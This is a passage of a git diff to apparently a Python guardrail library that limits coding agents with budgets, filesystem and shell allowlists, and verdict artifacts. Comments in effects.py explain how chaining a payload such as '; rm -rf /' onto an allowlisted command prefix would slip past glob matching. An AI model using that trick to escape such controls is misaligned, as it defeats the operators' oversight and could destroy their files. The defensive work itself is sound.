tokens, tool calls, and elapsed time. +Thread-safe counters for cost, tokens, tool calls, shell commands, and elapsed time. """ from __future__ import annotations @@ -32,37 +32,28 @@ class BudgetSnapshot: cost_usd: float = 0.0 tokens: int = 0 tool_calls: int = 0 + shell_commands: int = 0 elapsed_seconds: float = 0.0 class BudgetTracker: - """Thread-safe budget tracker with circuit breaker. - - Tracks cost, tokens, tool calls, and elapsed time against configured limits. - Raises BudgetExceededError when a threshold is hit. - """ + """Thread-safe budget tracker with circuit breaker.""" def __init__( self, budgets: Optional[ResourceBudgets] = None, cost_callback: Optional[Callable[[], float]] = None, ) -> None: - """ - Args: - budgets: Resource limits to enforce. None = no enforcement. - cost_callback: Optional callable that returns current accumulated cost. - If not provided, cost must be reported via add_cost(). - """ self._budgets = budgets self._cost_callback = cost_callback self._lock = threading.Lock() self._cost_usd: float = 0.0 self._tokens: int = 0 self._tool_calls: int = 0 + self._shell_commands: int = 0 self._start_time: float = time.monotonic() def _safe_cost_callback(self) -> float: - """Call cost callback safely, falling back to internal counter on error.""" if self._cost_callback: try: return self._cost_callback() @@ -72,22 +63,20 @@ def _safe_cost_callback(self) -> float: @property def is_configured(self) -> bool: - """Whether any budget limits are configured.""" return self._budgets is not None def snapshot(self) -> BudgetSnapshot: - """Get a thread-safe snapshot of current consumption.""" with self._lock: cost = self._safe_cost_callback() return BudgetSnapshot( cost_usd=cost, tokens=self._tokens, tool_calls=self._tool_calls, + shell_commands=self._shell_commands, elapsed_seconds=time.monotonic() - self._start_time, ) def add_cost(self, amount: float) -> None: - """Record cost and check against limit.""" if amount < 0: raise ValueError("Cost amount must be non-negative.") with self._lock: @@ -95,7 +84,6 @@ def add_cost(self, amount: float) -> None: self._check_cost() def add_tokens(self, count: int) -> None: - """Record token usage and check against limit.""" if count < 0: raise ValueError("Token count must be non-negative.") with self._lock: @@ -103,21 +91,24 @@ def add_tokens(self, count: int) -> None: self._check_tokens() def record_tool_call(self) -> None: - """Record a tool call and check against limit.""" with self._lock: self._tool_calls += 1 self._check_tool_calls() + def record_shell_command(self) -> None: + with self._lock: + self._shell_commands += 1 + self._check_shell_commands() + def check_all(self) -> None: - """Check all budget limits. Raises BudgetExceededError on first violation.""" with self._lock: self._check_cost() self._check_tokens() self._check_tool_calls() + self._check_shell_commands() self._check_duration() def check_duration(self) -> None: - """Check elapsed time against limit.""" with self._lock: self._check_duration() @@ -143,6 +134,15 @@ def _check_tool_calls(self) -> None: float(self._budgets.max_tool_calls), ) + def _check_shell_commands(self) -> None: + if self._budgets and self._budgets.max_shell_commands is not None: + if self._shell_commands > self._budgets.max_shell_commands: + raise BudgetExceededError( + "shell_commands", + float(self._shell_commands), + float(self._budgets.max_shell_commands), + ) + def _check_duration(self) -> None: if self._budgets and self._budgets.max_duration_seconds is not None: elapsed = time.monotonic() - self._start_time @@ -152,9 +152,9 @@ def _check_duration(self) -> None: ) def reset(self) -> None: - """Reset all counters and restart the timer.""" with self._lock: self._cost_usd = 0.0 self._tokens = 0 self._tool_calls = 0 + self._shell_commands = 0 self._start_time = time.monotonic() diff --git a/src/agent_contracts/cli.py b/src/agent_contracts/cli.py index b0cb337..2580ed2 100644 --- a/src/agent_contracts/cli.py +++ b/src/agent_contracts/cli.py @@ -1,4 +1,4 @@ -"""CLI for Agent Contracts — validate, check-compat, init, test.""" +"""CLI for Agent Contracts — repo-local guardrails for coding/build agents.""" from __future__ import annotations @@ -11,12 +11,13 @@ import yaml from agent_contracts._version import __version__ +from agent_contracts.enforcer import load_verdict_artifact @click.group() @click.version_option(version=__version__, prog_name="aicontracts") def main() -> None: - """Agent Contracts — YAML spec + SDK for production agent reliability.""" + """Agent Contracts — repo-local fail-closed guardrails for coding/build agents.""" pass @@ -25,25 +26,25 @@ def main() -> None: @click.option("--json-output", "-j", is_flag=True, help="Output as JSON.") def validate(contract_path: str, json_output: bool) -> None: """Validate a contract YAML file against the spec.""" - from agent_contracts.loader import ( - ContractLoadError, - load_contract_yaml, - validate_contract, - ) + from agent_contracts.loader import ContractLoadError, load_contract_yaml, validate_contract from agent_contracts.tier import assess_tier, recommend_upgrades try: data = load_contract_yaml(contract_path) - except ContractLoadError as e: - click.echo(f"Error: {e}", err=True) + except ContractLoadError as exc: + click.echo(f"Error: {exc}", err=True) sys.exit(1) errors = validate_contract(data) tier = assess_tier(data) recommendations = recommend_upgrades(data, tier) - tier_names = {0: "Standalone", 1: "Enforceable", 2: "Composable"} + authorized = data.get("effects", {}).get("authorized", {}) + filesystem = authorized.get("filesystem", {}) if isinstance(authorized, dict) else {} + shell = authorized.get("shell", {}) if isinstance(authorized, dict) else {} + observability = data.get("observability", {}) + if json_output: result = { "valid": len(errors) == 0, @@ -51,33 +52,45 @@ def validate(contract_path: str, json_output: bool) -> None: "tier_name": tier_names.get(tier, "Unknown"), "errors": errors, "recommendations": [ - {"field": r.field, "target_tier": r.target_tier, "reason": r.reason} - for r in recommendations + { + "field": item.field, + "target_tier": item.target_tier, + "reason": item.reason, + } + for item in recommendations ], + "coding_surfaces": { + "filesystem_read": filesystem.get("read", []), + "filesystem_write": filesystem.get("write", []), + "shell_commands": shell.get("commands", []), + "run_artifact_path": observability.get("run_artifact_path"), + }, } click.echo(json.dumps(result, indent=2)) else: identity = data.get("identity", {}) - name = identity.get("name", "unknown") - version = identity.get("version", "?") - - click.echo(f"Contract: {name}@{version}") + click.echo(f"Contract: {identity.get('name', 'unknown')}@{identity.get('version', '?')}") click.echo(f"Spec version: {data.get('agent_contract', '?')}") - if errors: click.echo(f"\nValidation: FAILED ({len(errors)} error(s))") - for e in errors: - click.echo(f" - {e}") + for error in errors: + click.echo(f" - {error}") sys.exit(1) - else: - click.echo("\nValidation: PASSED") - + click.echo("\nValidation: PASSED") click.echo(f"Tier: {tier} ({tier_names.get(tier, 'Unknown')})") - + if filesystem or shell or observability.get("run_artifact_path"): + click.echo("\nCoding/build surfaces:") + if filesystem: + click.echo(f" read: {filesystem.get('read', [])}") + click.echo(f" write: {filesystem.get('write', [])}") + if shell: + click.echo(f" shell: {shell.get('commands', [])}") + if observability.get("run_artifact_path"): + click.echo(f" verdict artifact: {observability['run_artifact_path']}") if recommendations: click.echo(f"\nRecommendations to reach Tier {tier + 1}:") - for r in recommendations: - click.echo(f" + {r.field}: {r.reason}") + for item in recommendations: + click.echo(f" + {item.field}: {item.reason}") if errors: sys.exit(1) @@ -95,23 +108,30 @@ def check_compat(producer_path: str, consumer_path: str, json_output: bool) -> N try: producer = load_contract(producer_path) consumer = load_contract(consumer_path) - except ContractLoadError as e: - click.echo(f"Error: {e}", err=True) + except ContractLoadError as exc: + click.echo(f"Error: {exc}", err=True) sys.exit(1) report = check_compatibility(producer, consumer) - if json_output: result = { "compatible": report.compatible, "producer": report.producer, "consumer": report.consumer, - "schema_gaps": [{"field": g.field_path, "issue": g.issue} for g in report.schema_gaps], - "capability_gaps": [{"tool": g.tool, "reason": g.reason} for g in report.capability_gaps], + "schema_gaps": [ + {"field": gap.field_path, "issue": gap.issue} for gap in report.schema_gaps + ], + "capability_gaps": [ + {"tool": gap.tool, "reason": gap.reason} for gap in report.capability_gaps + ], "budget_gaps": [ - {"type": g.budget_type, "producer_limit": g.producer_limit, - "consumer_limit": g.consumer_limit, "issue": g.issue} - for g in report.budget_gaps + { + "type": gap.budget_type, + "producer_limit": gap.producer_limit, + "consumer_limit": gap.consumer_limit, + "issue": gap.issue, + } + for gap in report.budget_gaps ], "effect_violations": report.effect_violations, "warnings": report.warnings, @@ -119,44 +139,50 @@ def check_compat(producer_path: str, consumer_path: str, json_output: bool) -> N click.echo(json.dumps(result, indent=2)) else: click.echo(report.summary()) - if report.schema_gaps: click.echo("\nSchema gaps:") - for g in report.schema_gaps: - click.echo(f" - {g.field_path}: {g.issue}") - + for gap in report.schema_gaps: + click.echo(f" - {gap.field_path}: {gap.issue}") if report.capability_gaps: click.echo("\nCapability gaps:") - for g in report.capability_gaps: - click.echo(f" - {g.tool}: {g.reason}") - + for capability_gap in report.capability_gaps: + click.echo(f" - {capability_gap.tool}: {capability_gap.reason}") if report.budget_gaps: click.echo("\nBudget gaps:") - for g in report.budget_gaps: - click.echo(f" - {g.issue}") - + for budget_gap in report.budget_gaps: + click.echo(f" - {budget_gap.issue}") if report.effect_violations: click.echo("\nEffect violations:") - for v in report.effect_violations: - click.echo(f" - {v}") - + for violation in report.effect_violations: + click.echo(f" - {violation}") if report.warnings: click.echo("\nWarnings:") - for w in report.warnings: - click.echo(f" - {w}") + for warning in report.warnings: + click.echo(f" - {warning}") if not report.compatible: sys.exit(1) @main.command() -@click.option("--from-trace", "-t", "trace_path", type=click.Path(exists=True), - help="JSONL trace file to generate from.") +@click.option("--from-trace", "-t", "trace_path", type=click.Path(exists=True), help="JSONL trace file to generate from.") @click.option("--name", "-n", "agent_name", help="Agent name override.") @click.option("--version", "-v", "agent_version", help="Agent version override.") @click.option("--output", "-o", "output_path", type=click.Path(), help="Output file path.") -def init(trace_path: Optional[str], agent_name: Optional[str], agent_version: Optional[str], - output_path: Optional[str]) -> None: +@click.option( + "--template", + type=click.Choice(["basic", "coding"], case_sensitive=False), + default="basic", + show_default=True, + help="Template to use when not generating from traces.", +) +def init( + trace_path: Optional[str], + agent_name: Optional[str], + agent_version: Optional[str], + output_path: Optional[str], + template: str, +) -> None: """Generate a contract skeleton (optionally from execution traces).""" from agent_contracts.init_from_trace import generate_contract_yaml @@ -165,26 +191,69 @@ def init(trace_path: Optional[str], agent_name: Optional[str], agent_version: Op trace_path, agent_name=agent_name, agent_version=agent_version ) else: - # Generate a minimal template - template = { - "agent_contract": "0.1.0", - "identity": { - "name": agent_name or "my-agent", - "version": agent_version or "0.1.0", - "description": "TODO: Describe what this agent does.", - }, - "contract": { - "postconditions": [ - { - "name": "produces_output", - "check": "output is not None", - "enforcement": "sync_block", - "severity": "critical", + if template == "coding": + payload = { + "agent_contract": "0.1.0", + "identity": { + "name": agent_name or "repo-build-agent", + "version": agent_version or "0.1.0", + "description": "Repo-local coding/build agent with fail-closed scopes.", + }, + "effects": { + "authorized": { + "filesystem": { + "read": ["src/**", "tests/**", "README.md", "pyproject.toml"], + "write": ["src/**", "tests/**", "README.md"], + }, + "shell": { + "commands": [ + "python -m pytest *", + "python -m ruff check *", + ] + }, + "tools": [], + "network": [], + "state_writes": [], } - ] - }, - } - result = yaml.dump(template, sort_keys=False, default_flow_style=False) + }, + "resources": { + "budgets": { + "max_tokens": 50000, + "max_tool_calls": 20, + "max_shell_commands": 10, + "max_duration_seconds": 1800, + } + }, + "observability": { + "run_artifact_path": ".agent-contracts/runs/{run_id}/verdict.json" + }, + "contract": { + "postconditions": [ + { + "name": "repo_checks_green", + "check": "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0", + } + ] + }, + } + else: + payload = { + "agent_contract": "0.1.0", + "identity": { + "name": agent_name or "my-agent", + "version": agent_version or "0.1.0", + "description": "TODO: Describe what this agent does.", + }, + "contract": { + "postconditions": [ + { + "name": "produces_output", + "check": "output is not None", + } + ] + }, + } + result = yaml.dump(payload, sort_keys=False, default_flow_style=False) if output_path: Path(output_path).write_text(result, encoding="utf-8") @@ -193,10 +262,46 @@ def init(trace_path: Optional[str], agent_name: Optional[str], agent_version: Op click.echo(result) +@main.command("check-verdict") +@click.argument("verdict_path", type=click.Path(exists=True)) +@click.option("--json-output", "-j", is_flag=True, help="Output as JSON.") +@click.option("--fail-on-warn", is_flag=True, help="Return non-zero for warn outcomes.") +def check_verdict(verdict_path: str, json_output: bool, fail_on_warn: bool) -> None: + """Inspect a verdict artifact and return a CI-friendly exit code.""" + verdict = load_verdict_artifact(verdict_path) + outcome = verdict.get("outcome", "unknown") + final_gate = verdict.get("final_gate", "unknown") + should_fail = outcome in {"blocked", "fail"} or (fail_on_warn and outcome == "warn") + + if json_output: + click.echo(json.dumps(verdict, indent=2)) + else: + click.echo(f"Outcome: {outcome}") + click.echo(f"Final gate: {final_gate}") + violations = verdict.get("violations", []) + checks = verdict.get("checks", []) + if violations: + click.echo("\nViolations:") + for violation in violations: + click.echo(f" - {violation.get('violated_clause')}") + if checks: + click.echo("\nChecks:") + for check in checks: + click.echo(f" - {check.get('name')}: {check.get('status')}") + + if should_fail: + sys.exit(1) + + @main.command() @click.argument("contract_path", type=click.Path(exists=True)) -@click.option("--eval-suite", "-e", "eval_dir", type=click.Path(exists=True), - help="Directory containing eval test cases (JSONL).") +@click.option( + "--eval-suite", + "-e", + "eval_dir", + type=click.Path(exists=True), + help="Directory containing eval test cases (JSONL).", +) def test(contract_path: str, eval_dir: Optional[str]) -> None: """Run eval suite against contract postconditions.""" from agent_contracts.loader import ContractLoadError, load_contract @@ -204,15 +309,17 @@ def test(contract_path: str, eval_dir: Optional[str]) -> None: try: contract = load_contract(contract_path) - except ContractLoadError as e: - click.echo(f"Error loading contract: {e}", err=True) + except ContractLoadError as exc: + click.echo(f"Error loading contract: {exc}", err=True) sys.exit(1) if not eval_dir: click.echo(f"Contract '{contract.identity.name}' loaded (Tier {contract.tier}).") click.echo(f"Postconditions: {len(contract.postconditions)}") - for pc in contract.postconditions: - click.echo(f" - {pc.name} ({pc.enforcement}): {pc.check}") + for postcondition in contract.postconditions: + click.echo( + f" - {postcondition.name} ({postcondition.enforcement}): {postcondition.check}" + ) click.echo("\nNo eval suite specified. Use --eval-suite to run tests.") return @@ -226,10 +333,10 @@ def test(contract_path: str, eval_dir: Optional[str]) -> None: passed = 0 failed = 0 - for tf in test_files: - click.echo(f"\n--- {tf.name} ---") - with open(tf, encoding="utf-8") as f: - for line_num, line in enumerate(f, 1): + for test_file in test_files: + click.echo(f"\n--- {test_file.name} ---") + with open(test_file, encoding="utf-8") as handle: + for line_num, line in enumerate(handle, 1): line = line.strip() if not line: continue @@ -238,24 +345,24 @@ def test(contract_path: str, eval_dir: Optional[str]) -> None: except json.JSONDecodeError: click.echo(f" Line {line_num}: SKIP (invalid JSON)") continue - output = case.get("output", case.get("result")) total += 1 try: - results = evaluate_postconditions( - contract.postconditions, output - ) - all_passed = all(r.passed for r in results) - if all_passed: + results = evaluate_postconditions(contract.postconditions, output) + if all(result.passed for result in results): passed += 1 click.echo(f" Case {line_num}: PASS") else: failed += 1 - failed_names = [r.postcondition.name for r in results if not r.passed] + failed_names = [ + result.postcondition.name for result in results if not result.passed + ] click.echo(f" Case {line_num}: FAIL ({', '.join(failed_names)})") - except PostconditionError as e: + except PostconditionError as exc: failed += 1 - click.echo(f" Case {line_num}: FAIL (blocked: {e.postcondition.name})") + click.echo( + f" Case {line_num}: FAIL (blocked: {exc.postcondition.name})" + ) click.echo(f"\nResults: {passed}/{total} passed, {failed} failed") if failed > 0: diff --git a/src/agent_contracts/composition.py b/src/agent_contracts/composition.py index c04d3a5..4c2ba92 100644 --- a/src/agent_contracts/composition.py +++ b/src/agent_contracts/composition.py @@ -18,24 +18,18 @@ @dataclass class SchemaGap: - """A gap between producer output and consumer input schemas.""" - field_path: str issue: str @dataclass class CapabilityGap: - """A tool the consumer needs but the producer doesn't authorize for delegation.""" - tool: str reason: str @dataclass class BudgetGap: - """A budget field where the consumer exceeds what the producer allows.""" - budget_type: str producer_limit: Optional[float] consumer_limit: Optional[float] @@ -44,8 +38,6 @@ class BudgetGap: @dataclass class CompatibilityReport: - """Full compatibility report between two contracts.""" - compatible: bool producer: str consumer: str @@ -56,7 +48,6 @@ class CompatibilityReport: warnings: List[str] = field(default_factory=list) def summary(self) -> str: - """One-line summary of compatibility.""" if self.compatible: warnings = f" ({len(self.warnings)} warnings)" if self.warnings else "" return f"Compatible: {self.producer} -> {self.consumer}{warnings}" @@ -73,21 +64,18 @@ def _check_schema_compatibility( producer_output: Optional[Dict[str, Any]], consumer_input: Optional[Dict[str, Any]], ) -> List[SchemaGap]: - """Check if producer output schema is assignable to consumer input schema. - - This is a structural compatibility check, not full JSON Schema subtyping. - Checks that required consumer input fields exist in producer output. - """ gaps: List[SchemaGap] = [] if consumer_input is None: - return gaps # Consumer accepts anything + return gaps if producer_output is None: - gaps.append(SchemaGap( - field_path="(root)", - issue="Consumer expects structured input but producer has no output schema.", - )) + gaps.append( + SchemaGap( + field_path="(root)", + issue="Consumer expects structured input but producer has no output schema.", + ) + ) return gaps consumer_required = consumer_input.get("required", []) @@ -95,60 +83,69 @@ def _check_schema_compatibility( for req_field in consumer_required: if req_field not in producer_props: - gaps.append(SchemaGap( - field_path=req_field, - issue=f"Consumer requires field '{req_field}' but producer output schema doesn't define it.", - )) + gaps.append( + SchemaGap( + field_path=req_field, + issue=( + f"Consumer requires field '{req_field}' but producer output schema " + "doesn't define it." + ), + ) + ) - # Check type compatibility for shared fields consumer_props = consumer_input.get("properties", {}) for field_name, consumer_field in consumer_props.items(): if field_name in producer_props: producer_type = producer_props[field_name].get("type") consumer_type = consumer_field.get("type") if producer_type and consumer_type and producer_type != consumer_type: - gaps.append(SchemaGap( - field_path=field_name, - issue=f"Type mismatch: producer outputs '{producer_type}' but consumer expects '{consumer_type}'.", - )) + gaps.append( + SchemaGap( + field_path=field_name, + issue=( + f"Type mismatch: producer outputs '{producer_type}' " + f"but consumer expects '{consumer_type}'." + ), + ) + ) return gaps -def _check_capability_compatibility( - producer: Contract, consumer: Contract -) -> List[CapabilityGap]: - """Check if the consumer's tool needs are covered by the producer's delegation.""" +def _check_capability_compatibility(producer: Contract, consumer: Contract) -> List[CapabilityGap]: gaps: List[CapabilityGap] = [] if consumer.effects_authorized is None: return gaps - # If producer has delegation rules, check allowed agents if producer.delegation and producer.delegation.allowed_agents is not None: if consumer.identity.name not in producer.delegation.allowed_agents: - gaps.append(CapabilityGap( - tool="(delegation)", - reason=f"Consumer '{consumer.identity.name}' not in producer's allowed_agents list.", - )) + gaps.append( + CapabilityGap( + tool="(delegation)", + reason=( + f"Consumer '{consumer.identity.name}' not in producer's " + "allowed_agents list." + ), + ) + ) - # If producer has authorized effects and attenuates during delegation, - # check that consumer's needed tools are within producer's scope if producer.effects_authorized and consumer.effects_authorized: for tool in consumer.effects_authorized.tools: if not matches_any(tool, producer.effects_authorized.tools): - gaps.append(CapabilityGap( - tool=tool, - reason=f"Consumer needs tool '{tool}' but producer doesn't authorize it.", - )) + gaps.append( + CapabilityGap( + tool=tool, + reason=( + f"Consumer needs tool '{tool}' but producer doesn't authorize it." + ), + ) + ) return gaps -def _check_budget_compatibility( - producer: Contract, consumer: Contract -) -> List[BudgetGap]: - """Check if consumer budget fits within producer budget.""" +def _check_budget_compatibility(producer: Contract, consumer: Contract) -> List[BudgetGap]: gaps: List[BudgetGap] = [] if producer.budgets is None or consumer.budgets is None: @@ -158,41 +155,50 @@ def _check_budget_compatibility( ("max_cost_usd", producer.budgets.max_cost_usd, consumer.budgets.max_cost_usd), ("max_tokens", producer.budgets.max_tokens, consumer.budgets.max_tokens), ("max_tool_calls", producer.budgets.max_tool_calls, consumer.budgets.max_tool_calls), - ("max_duration_seconds", producer.budgets.max_duration_seconds, consumer.budgets.max_duration_seconds), + ( + "max_duration_seconds", + producer.budgets.max_duration_seconds, + consumer.budgets.max_duration_seconds, + ), + ( + "max_shell_commands", + producer.budgets.max_shell_commands, + consumer.budgets.max_shell_commands, + ), ] for budget_type, prod_limit, cons_limit in checks: if prod_limit is not None and cons_limit is not None: if cons_limit > prod_limit: - gaps.append(BudgetGap( + gaps.append( + BudgetGap( + budget_type=budget_type, + producer_limit=float(prod_limit), + consumer_limit=float(cons_limit), + issue=( + f"Consumer {budget_type}={cons_limit} exceeds producer " + f"limit={prod_limit}." + ), + ) + ) + elif prod_limit is not None and cons_limit is None: + gaps.append( + BudgetGap( budget_type=budget_type, producer_limit=float(prod_limit), - consumer_limit=float(cons_limit), - issue=f"Consumer {budget_type}={cons_limit} exceeds producer limit={prod_limit}.", - )) - elif prod_limit is not None and cons_limit is None: - gaps.append(BudgetGap( - budget_type=budget_type, - producer_limit=float(prod_limit), - consumer_limit=None, - issue=f"Producer limits {budget_type}={prod_limit} but consumer has no limit.", - )) + consumer_limit=None, + issue=( + f"Producer limits {budget_type}={prod_limit} but consumer has no limit." + ), + ) + ) return gaps def check_compatibility(producer: Contract, consumer: Contract) -> CompatibilityReport: - """Compute the Contract Differential between a producer and consumer. - - Checks schema assignability, capability coverage, budget fit, - and effect authorization compliance. - """ - schema_gaps = _check_schema_compatibility( - producer.output_schema, consumer.input_schema - ) - + schema_gaps = _check_schema_compatibility(producer.output_schema, consumer.input_schema) capability_gaps = _check_capability_compatibility(producer, consumer) - budget_gaps = _check_budget_compatibility(producer, consumer) effect_violations: List[str] = [] @@ -203,9 +209,13 @@ def check_compatibility(producer: Contract, consumer: Contract) -> Compatibility warnings: List[str] = [] if producer.tier < 2: - warnings.append(f"Producer '{producer.identity.name}' is Tier {producer.tier}; Tier 2 recommended for composition.") + warnings.append( + f"Producer '{producer.identity.name}' is Tier {producer.tier}; Tier 2 recommended for composition." + ) if consumer.tier < 2: - warnings.append(f"Consumer '{consumer.identity.name}' is Tier {consumer.tier}; Tier 2 recommended for composition.") + warnings.append( + f"Consumer '{consumer.identity.name}' is Tier {consumer.tier}; Tier 2 recommended for composition." + ) compatible = ( len(schema_gaps) == 0 diff --git a/src/agent_contracts/effects.py b/src/agent_contracts/effects.py index 557561d..57dfb03 100644 --- a/src/agent_contracts/effects.py +++ b/src/agent_contracts/effects.py @@ -1,4 +1,4 @@ -"""Effect authorization — default-deny tool gating with glob pattern matching. +"""Effect authorization for coding/build agents. Authorized effects compose via intersection during delegation. Declared effects compose via union for auditing. @@ -8,64 +8,170 @@ from __future__ import annotations import fnmatch -from typing import List, Optional, Set - -from agent_contracts.types import EffectsAuthorized, EffectsDeclared +from pathlib import Path +from typing import List, Optional, Sequence, Set + +from agent_contracts.types import ( + EffectsAuthorized, + EffectsDeclared, + FilesystemAuthorization, + ShellAuthorization, +) + +# Shell metacharacters that enable command chaining, redirection, or +# substitution. Any command containing one of these is rejected outright +# in v0.2.x, regardless of pattern match. The fail-closed contract has +# no safe way to express "this prefix is allowed but only without an +# appended `; rm -rf /`" using fnmatch globs, because `*` would consume +# the operator and the payload as ordinary characters. +# +# v0.3.x will introduce a shlex-based token matcher that can express +# richer command shapes safely; until then, strict reject is the only +# correct fail-closed behavior. +_SHELL_METACHARS = frozenset(";&|<>`\n") +_SHELL_METASEQUENCES = ("$(",) + + +def _shell_metachar_in(command: str) -> Optional[str]: + """Return the first shell metacharacter found, or None.""" + for ch in command: + if ch in _SHELL_METACHARS: + return ch + for seq in _SHELL_METASEQUENCES: + if seq in command: + return seq + return None class EffectDeniedError(Exception): """Raised when a tool call or effect is not authorized.""" - def __init__(self, effect_type: str, name: str, allowed: List[str]) -> None: + def __init__(self, effect_type: str, name: str, allowed: Sequence[str]) -> None: self.effect_type = effect_type self.name = name - self.allowed = allowed + self.allowed = list(allowed) super().__init__( f"{effect_type} '{name}' denied. " - f"Authorized: {allowed if allowed else '(none — default deny)'}" + f"Authorized: {list(allowed) if allowed else '(none — default deny)'}" + ) + + +class ShellMetacharacterError(EffectDeniedError): + """Raised when a shell command contains a chaining/redirection/ + substitution metacharacter. Distinct from a plain authorization + failure so callers and verdict artifacts can distinguish 'matched + no allowlist entry' from 'attempted to chain commands'.""" + + def __init__(self, command: str, metachar: str, allowed: Sequence[str]) -> None: + self.metachar = metachar + self.command = command + super().__init__( + "shell.command", + command, + allowed, + ) + # Override the message to surface the bypass attempt explicitly. + self.args = ( + f"shell.command '{command}' rejected: contains shell metacharacter " + f"'{metachar}'. Command chaining, redirection, and substitution are " + f"not permitted under v0.2.x effect authorization. " + f"Authorized patterns: {list(allowed) if allowed else '(none)'}", ) -def matches_any(name: str, patterns: List[str]) -> bool: +def matches_any(name: str, patterns: Sequence[str]) -> bool: """Check if a name matches any of the given glob patterns.""" return any(fnmatch.fnmatch(name, pattern) for pattern in patterns) -class EffectGuard: - """Enforces the effects.authorized allowlist (default-deny). +def _intersect_lists(parent_list: Sequence[str], child_list: Sequence[str]) -> List[str]: + result: List[str] = [] + for child_pattern in child_list: + if matches_any(child_pattern, parent_list) or any( + fnmatch.fnmatch(parent_pattern, child_pattern) for parent_pattern in parent_list + ): + result.append(child_pattern) + return result - All checks are O(n) where n = number of patterns. For production - workloads with large allowlists, consider pre-compiling patterns. - """ - def __init__(self, authorized: Optional[EffectsAuthorized] = None) -> None: +class EffectGuard: + """Enforces the effects.authorized allowlist (default-deny when configured).""" + + def __init__( + self, + authorized: Optional[EffectsAuthorized] = None, + *, + repo_root: Optional[Path] = None, + ) -> None: self._authorized = authorized + self._repo_root = repo_root.resolve() if repo_root is not None else Path.cwd().resolve() @property def is_configured(self) -> bool: - """Whether effect authorization is configured.""" + """Whether effect authorization was configured on the contract.""" return self._authorized is not None + def _path_candidates(self, path: str) -> List[str]: + raw = Path(path) + absolute = raw if raw.is_absolute() else (self._repo_root / raw) + absolute = absolute.resolve() + candidates: List[str] = [path, absolute.as_posix()] + try: + candidates.append(absolute.relative_to(self._repo_root).as_posix()) + except ValueError: + pass + return list(dict.fromkeys(candidates)) + + def _filesystem_matches(self, path: str, patterns: Sequence[str]) -> bool: + return any(matches_any(candidate, patterns) for candidate in self._path_candidates(path)) + + def _normalized_command(self, command: str) -> str: + return " ".join(command.strip().split()) + def check_tool(self, tool_name: str) -> bool: - """Check if a tool call is authorized. Returns True if allowed.""" if self._authorized is None: - return True # No authorization configured = allow all + return True return matches_any(tool_name, self._authorized.tools) def check_network(self, url: str) -> bool: - """Check if a network request is authorized.""" if self._authorized is None: return True return matches_any(url, self._authorized.network) def check_state_write(self, scope: str) -> bool: - """Check if a state write is authorized.""" if self._authorized is None: return True return matches_any(scope, self._authorized.state_writes) + def check_file_read(self, path: str) -> bool: + if self._authorized is None or self._authorized.filesystem is None: + return True + return self._filesystem_matches(path, self._authorized.filesystem.read) + + def check_file_write(self, path: str) -> bool: + if self._authorized is None or self._authorized.filesystem is None: + return True + return self._filesystem_matches(path, self._authorized.filesystem.write) + + def check_shell_command(self, command: str) -> bool: + if self._authorized is None or self._authorized.shell is None: + return True + # Strict reject: any chaining/redirection/substitution metachar + # bypasses fnmatch's `*` and would let an attacker append payloads + # after an allowlisted prefix. Scan the RAW command (not the + # whitespace-normalized form) so newlines are not lost. + if _shell_metachar_in(command) is not None: + return False + normalized = self._normalized_command(command) + return matches_any(normalized, self._authorized.shell.commands) + + def shell_command_metachar(self, command: str) -> Optional[str]: + """Return the first shell metacharacter in the command, or None. + Exposed so callers can distinguish 'unauthorized' from 'rejected + as a chaining attempt' when constructing verdicts.""" + return _shell_metachar_in(command) + def require_tool(self, tool_name: str) -> None: - """Assert a tool call is authorized; raise EffectDeniedError if not.""" if not self.check_tool(tool_name): raise EffectDeniedError( "tool", @@ -74,7 +180,6 @@ def require_tool(self, tool_name: str) -> None: ) def require_network(self, url: str) -> None: - """Assert a network request is authorized.""" if not self.check_network(url): raise EffectDeniedError( "network", @@ -83,7 +188,6 @@ def require_network(self, url: str) -> None: ) def require_state_write(self, scope: str) -> None: - """Assert a state write is authorized.""" if not self.check_state_write(scope): raise EffectDeniedError( "state_write", @@ -91,30 +195,56 @@ def require_state_write(self, scope: str) -> None: self._authorized.state_writes if self._authorized else [], ) + def require_file_read(self, path: str) -> None: + if not self.check_file_read(path): + allowed = [] + if self._authorized is not None and self._authorized.filesystem is not None: + allowed = self._authorized.filesystem.read + raise EffectDeniedError("filesystem.read", path, allowed) + + def require_file_write(self, path: str) -> None: + if not self.check_file_write(path): + allowed = [] + if self._authorized is not None and self._authorized.filesystem is not None: + allowed = self._authorized.filesystem.write + raise EffectDeniedError("filesystem.write", path, allowed) + + def require_shell_command(self, command: str) -> None: + if not self.check_shell_command(command): + allowed: List[str] = [] + if self._authorized is not None and self._authorized.shell is not None: + allowed = list(self._authorized.shell.commands) + metachar = _shell_metachar_in(command) + normalized = self._normalized_command(command) + if metachar is not None: + raise ShellMetacharacterError(normalized, metachar, allowed) + raise EffectDeniedError("shell.command", normalized, allowed) + + +def intersect_authorized(parent: EffectsAuthorized, child: EffectsAuthorized) -> EffectsAuthorized: + """Compute intersection of authorized effects (capability attenuation for delegation).""" + + filesystem: Optional[FilesystemAuthorization] = None + if parent.filesystem is not None or child.filesystem is not None: + parent_fs = parent.filesystem or FilesystemAuthorization() + child_fs = child.filesystem or FilesystemAuthorization() + filesystem = FilesystemAuthorization( + read=_intersect_lists(parent_fs.read, child_fs.read), + write=_intersect_lists(parent_fs.write, child_fs.write), + ) -def intersect_authorized( - parent: EffectsAuthorized, child: EffectsAuthorized -) -> EffectsAuthorized: - """Compute intersection of authorized effects (capability attenuation for delegation). - - The child can only use effects that BOTH parent and child authorize. - Uses glob matching: a child pattern is kept only if it matches at least - one parent pattern, or vice versa. - """ - - def _intersect_lists(parent_list: List[str], child_list: List[str]) -> List[str]: - result: List[str] = [] - for c in child_list: - if matches_any(c, parent_list) or any( - fnmatch.fnmatch(p, c) for p in parent_list - ): - result.append(c) - return result + shell: Optional[ShellAuthorization] = None + if parent.shell is not None or child.shell is not None: + parent_shell = parent.shell or ShellAuthorization() + child_shell = child.shell or ShellAuthorization() + shell = ShellAuthorization(commands=_intersect_lists(parent_shell.commands, child_shell.commands)) return EffectsAuthorized( tools=_intersect_lists(parent.tools, child.tools), network=_intersect_lists(parent.network, child.network), state_writes=_intersect_lists(parent.state_writes, child.state_writes), + filesystem=filesystem, + shell=shell, ) @@ -140,10 +270,7 @@ def _union_unique(x: List[str], y: List[str]) -> List[str]: def validate_declared_subset( declared: EffectsDeclared, authorized: EffectsAuthorized ) -> List[str]: - """Validate that declared effects are a subset of authorized effects. - - Returns a list of violation messages. Empty = valid. - """ + """Validate that declared effects are a subset of authorized effects.""" violations: List[str] = [] for tool in declared.tools: if not 